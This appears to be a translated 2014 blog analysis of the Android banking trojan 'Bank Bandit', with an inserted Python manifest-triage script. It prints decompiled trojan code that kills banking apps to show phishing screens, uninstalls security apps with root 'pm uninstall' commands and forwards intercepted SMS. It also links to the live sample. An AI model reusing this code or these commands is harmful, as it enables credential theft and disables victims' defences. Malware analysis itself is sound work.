
Exclusive analysis of the Android virus “银行悍匪” (Bank Bandit)

Source: 西西教程网  Published: 2014/3/24 9:14:21

Author: 西西小熊  Tag: 银行悍匪


1. Basic information on the virus sample

FileName: b5910a432d2b866e1028f31874edb32f.apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1: 0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 bytes
Package: langthing.nend
Download: http://yunpan.cn/Q4qHuRLaNivtd    access code 3a90    archive password: 52pojie

// The virus first disguises itself as a system program to prevent uninstallation; it then attempts to uninstall security software; it monitors a range of banking apps; the keywords used to intercept SMS messages are stored encrypted, which makes analysis harder; and it has no MAIN/LAUNCHER component, so no icon appears after installation and the user does not notice that an app was installed.

2. Analysis of the virus code

Inspecting the AndroidManifest.xml configuration shows that the virus requests a very large number of permissions, many of them high-risk: sending SMS, placing phone calls, reading log files, restarting applications and so on. It also declares no MAIN or LAUNCHER component:

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />          <!-- receive SMS -->
    <uses-permission android:name="android.permission.SEND_SMS" />             <!-- send SMS -->
    <uses-permission android:name="android.permission.READ_SMS" />             <!-- read SMS -->
    <uses-permission android:name="android.permission.WRITE_SMS" />            <!-- edit SMS -->
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />        <!-- read the address book -->
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />       <!-- access to the system settings database -->
    <uses-permission android:name="android.permission.READ_LOGS" />            <!-- read log files -->
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />       <!-- edit contacts -->
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />     <!-- read phone state -->
    <uses-permission android:name="android.permission.CALL_PHONE" />           <!-- place phone calls -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <!-- receive the boot-completed broadcast -->
    <uses-permission android:name="android.permission.GET_TASKS" />            <!-- list running apps -->
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />     <!-- restart (kill) applications -->

The manifest also shows the broadcast receivers that start the program: TReceiver (on boot completed), deviceAdminReceiver (when device administration is enabled), Alarmreceiver (on a custom alarm action) and others:

        <receiver android:name=".TReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".Alarmreceiver">
            <intent-filter>
                <action android:name="arui.alarm.action" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ShutdownReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
            </intent-filter>
        </receiver>
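As an added example (not part of the original analysis), the following Python script statically triages an AndroidManifest.xml for the combination of traits described above: the SMS permission set, the absence of a MAIN/LAUNCHER activity, a BIND_DEVICE_ADMIN receiver and a BOOT_COMPLETED receiver with an abnormally high priority. The embedded manifest is constructed to mirror this sample rather than being the real file, and the scoring rule in is_suspicious is an assumed triage heuristic, not something taken from the page.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: attribute namespace

# Permissions from the sample's manifest that enable SMS theft and persistence.
RISKY = {
    "android.permission.RECEIVE_SMS", "android.permission.SEND_SMS",
    "android.permission.READ_SMS", "android.permission.WRITE_SMS",
    "android.permission.CALL_PHONE", "android.permission.READ_LOGS",
    "android.permission.RESTART_PACKAGES",
}

def triage_manifest(xml_text):
    """Collect the traits this family shows from one manifest's XML text."""
    root = ET.fromstring(xml_text)
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    filters = list(root.iter("intent-filter"))
    def has(f, tag, value):  # does intent-filter f contain <tag android:name=value>?
        return any(e.get(A + "name") == value for e in f.iter(tag))
    launcher = any(has(f, "action", "android.intent.action.MAIN") and
                   has(f, "category", "android.intent.category.LAUNCHER") for f in filters)
    # Highest priority declared on any BOOT_COMPLETED filter (None if there is none).
    boot_prio = max((int(f.get(A + "priority", "0")) for f in filters
                     if has(f, "action", "android.intent.action.BOOT_COMPLETED")), default=None)
    admin = any(r.get(A + "permission") == "android.permission.BIND_DEVICE_ADMIN"
                for r in root.iter("receiver"))
    return {
        "risky_permissions": sorted(perms & RISKY),
        "sms_control": {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= perms,
        "no_launcher": not launcher,          # no icon: the user never sees the app
        "device_admin_receiver": admin,       # resists uninstall once activated
        "boot_receiver_priority": boot_prio,
    }

def is_suspicious(ind):
    """Assumed heuristic: SMS control plus at least two stealth/persistence traits."""
    stealth = [ind["no_launcher"], ind["device_admin_receiver"],
               (ind["boot_receiver_priority"] or 0) > 1000]
    return ind["sms_control"] and sum(stealth) >= 2

# Constructed manifest mirroring the sample's traits (not the real file).
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="langthing.nend">
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<application><receiver android:name=".TReceiver"><intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>
<receiver android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
<intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
</receiver></application></manifest>"""
```

Running `triage_manifest(SAMPLE)` on a manifest decoded from an APK (for example with apktool) gives the indicator dictionary; a normal app with a launcher activity and no device-admin receiver scores as not suspicious.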

The code tree of the injected malicious code is shown in the figure below:

[figure]

Once installed, the program disguises itself as a system program to prevent uninstallation, as shown in the figure:

[figure]

The disguise code in langthing.nend.main is as follows:

private void b()
  {
    // Request device-administrator rights; this.c is the ComponentName of deviceAdminReceiver
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  // disguised as a system application
    startActivityForResult(localIntent, 1);
  }

When the app detects that a banking client has been launched, it kills that bank's process and shows a custom, highly realistic "phishing screen" tailored to the bank (ICBC, Taobao and others):

private void e()
  {
    // p is the ActivityManager saved in onCreate(); inspect the foreground activity
    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
    String str = localComponentName.getClassName();
    // If the top activity matches one of these class-name patterns, kill every installed banking client
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.bankcomm"))
        localActivityManager.restartPackage("com.bankcomm");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
      if (a(getApplicationContext(), "com.android.bankabc"))
        localActivityManager.restartPackage("com.android.bankabc");
      if (a(getApplicationContext(), "cmb.pb"))
        localActivityManager.restartPackage("cmb.pb");
      if (a(getApplicationContext(), "com.rytong.bankgdb"))
        localActivityManager.restartPackage("com.rytong.bankgdb");
      if (a(getApplicationContext(), "com.cib.bankcib"))
        localActivityManager.restartPackage("com.cib.bankcib");
      if (a(getApplicationContext(), "com.rytong.bankps"))
        localActivityManager.restartPackage("com.rytong.bankps");
      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
        localActivityManager.restartPackage("com.ecitic.bank.mobile");
      if (a(getApplicationContext(), "com.cebbank.bankebb"))
        localActivityManager.restartPackage("com.cebbank.bankebb");
      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
        localActivityManager.restartPackage("cn.com.cmbc.mbank");
      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
      if (a(getApplicationContext(), "com.pingan.pabank.activity"))
        localActivityManager.restartPackage("com.pingan.pabank.activity");
      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
        localActivityManager.restartPackage("com.gzrcb.mobilebank");
      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
        localActivityManager.restartPackage("com.chinamworld.bocmbci");
      if (a(getApplicationContext(), "com.rytong.app.bankhx"))
        localActivityManager.restartPackage("com.rytong.app.bankhx");
      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
      if (a(getApplicationContext(), "cn.com.shbank.mper"))
        localActivityManager.restartPackage("cn.com.shbank.mper");
      if (a(getApplicationContext(), "com.rytong.bankqd"))
        localActivityManager.restartPackage("com.rytong.bankqd");
      if (a(getApplicationContext(), "com.tlbank"))
        localActivityManager.restartPackage("com.tlbank");
      if (a(getApplicationContext(), "com.sookin.scyh"))
        localActivityManager.restartPackage("com.sookin.scyh");
      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.klb"))
        localActivityManager.restartPackage("com.chinamworld.klb");
    }
    // The real ICBC client is in the foreground: unless the local database already records it
    // (table "yh", row "mc"="gs", flag "jilu"), kill it, jump to the home screen and start the
    // spoofed ICBC screen (gs) on top
    if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        new Intent("android.intent.action.MAIN");
        Intent localIntent53 = new Intent("android.intent.action.MAIN");
        localIntent53.setFlags(268435456);  // FLAG_ACTIVITY_NEW_TASK
        localIntent53.addCategory("android.intent.category.HOME");
        startActivity(localIntent53);
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);
      }
    }
    // Same pattern for com.chinamworld.main with the spoofed screen js
    if (str.contains("com.chinamworld.main"))
    {
      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.chinamworld.main");
        new Intent("android.intent.action.MAIN");
        Intent localIntent51 = new Intent("android.intent.action.MAIN");
        localIntent51.setFlags(268435456);
        localIntent51.addCategory("android.intent.category.HOME");
        startActivity(localIntent51);
        Intent localIntent52 = new Intent(getApplicationContext(), js.class);
        localIntent52.setFlags(268435456);
        startActivity(localIntent52);
      }
    }
    // Same pattern for com.bankcomm with the spoofed screen jt
    if (str.contains("bankcomm"))
    {
      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.bankcomm");
        new Intent("android.intent.action.MAIN");
        Intent localIntent49 = new Intent("android.intent.action.MAIN");
        localIntent49.setFlags(268435456);
        localIntent49.addCategory("android.intent.category.HOME");
        startActivity(localIntent49);
        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
        localIntent50.setFlags(268435456);
        startActivity(localIntent50);
      }
    }
    // Same pattern for Taobao with the spoofed screen tb
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        new Intent("android.intent.action.MAIN");
        Intent localIntent47 = new Intent("android.intent.action.MAIN");
        localIntent47.setFlags(268435456);
        localIntent47.addCategory("android.intent.category.HOME");
        startActivity(localIntent47);
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }
    }
//  kill each bank's process

Finding and uninstalling security software:

for (g = "Already root"; ; g = "NOroot")
   {
     this.C = 5;
     this.E = 5;
     this.B = new String[this.C];   // shell commands to run with root
     this.D = new String[this.E];   // package names of the targeted security apps
     this.B[0] = "pm uninstall com.qihoo360.mobilesafe";     // uninstall the security software of 360, Tencent, Kingsoft and others
     this.B[1] = "pm uninstall com.tencent.qqpimsecure";
     this.B[2] = "pm uninstall com.ijinshan.mguard";
     this.B[3] = "pm uninstall com.ijinshan.duba";
     this.B[4] = "pm uninstall com.anguanjia.safe";
     this.D[0] = "com.qihoo360.mobilesafe";
     this.D[1] = "com.tencent.qqpimsecure";
     this.D[2] = "com.ijinshan.mguard";
     this.D[3] = "com.ijinshan.duba";
     this.D[4] = "com.anguanjia.safe";
     this.s = new o();

Intercepting related SMS messages (this is the SMS content observer's onChange; the decompiler's control flow is left as produced):

if (i5 == 1)
          if ((server.f == 0) && (server.a != i3))
          {
            server.a(this.a, 1);
            server.b(this.a, i3);
            str4 = "接收";   // "received"
            server.a(this.a, new o());
            String str5 = server.d(this.a).a(this.a.getApplicationContext());
            server.a(this.a, new n());
            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);  // forward the received message
            localStringBuilder.append("[ ");
            localStringBuilder.append(str1 + ", ");
            localStringBuilder.append(i4 + ", ");
            localStringBuilder.append(str2 + ", ");
            localStringBuilder.append(str3 + ", ");
            localStringBuilder.append(str4);
            localStringBuilder.append(" ]\n\n");
            if (!localCursor1.isClosed())
              localCursor1.close();
          }
      }
      while (true)
      {
        localStringBuilder.append("getSmsInPhone has executed!");
        super.onChange(paramBoolean);
        return;
        server.f = 0;
        break;
        if (i5 != 2)
          break;
        if (server.b == i3)
          break label760;
        // Replay queued outgoing messages from the "send" table
        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");
        if (localCursor2.moveToFirst())
        {
          localCursor2.getColumnIndex("_id");
          int i6 = localCursor2.getColumnIndex("sSend");
          do
            server.a(this.a, localCursor2.getString(i6));
          while (localCursor2.moveToNext());
        }
        localCursor2.close();
        if (server.h(this.a).equals("1"))
        {
          server.a(this.a, new o());
          server.a(this.a, new n());
          String str6 = server.d(this.a).a(this.a.getApplicationContext());
          server.a(this.a, str2 + ";" + str1, str6);
        }
        server.b = i3;
        str4 = "发送";   // "sent"
        break;
        localStringBuilder.append("no result!");
      }
    }
    catch (SQLiteException localSQLiteException)
    {
      while (true)
      {
        continue;
        label760: String str4 = "null";
      }
    }
  }
}

Decryption key:

public void a()
  {
    try
    {
      // Copy the bundled database unhi.db (the key, per the author) from the APK assets to the app's files directory
      InputStream localInputStream = getAssets().open("unhi.db");     // key
      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
      byte[] arrayOfByte = new byte[1024];
      while (true)
      {
        int i1 = localInputStream.read(arrayOfByte);
        if (i1 <= 0)
        {
          localFileOutputStream.flush();
          localFileOutputStream.close();
          localInputStream.close();
          return;
        }
        localFileOutputStream.write(arrayOfByte, 0, i1);
      }
    }
    catch (Exception localException)
    {
    }
  }

  public void a(String paramString)
  {
    // Extract the database only if it is not present yet
    if (!new File(paramString).exists())
      a();
  }

  public void c()
  {
    new l(this).start();
  }

  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }

  public void onCreate()
  {
    // Register an SMS_RECEIVED receiver with the maximum priority so the trojan sees messages first
    this.u = new e();
    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    localIntentFilter.setPriority(2147483647);
    registerReceiver(this.u, localIntentFilter);
    p = (ActivityManager)getSystemService("activity");
    this.F = 0;
    this.j = false;
    // Report root status, Android version and device model
    b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
    this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
    a(this.q + "unhi.db");
    c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);
    // Observe the SMS content provider so every change triggers the onChange handler shown above
    m localm = new m(this, new Handler());
    getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);
    Intent localIntent = new Intent(getApplicationContext(), log.class);
    localIntent.setFlags(268435456);
    startService(localIntent);


 

3. Summary

The virus attempts to uninstall security software, uses encryption to hinder analysis, and hides its user interface so the user does not notice it. Mobile security problems are clearly growing more serious and the techniques more sophisticated, which makes analysis harder.

// Since my knowledge of cryptography is not even at the Hello World level, I was unable to decrypt the related information; my skills are limited.
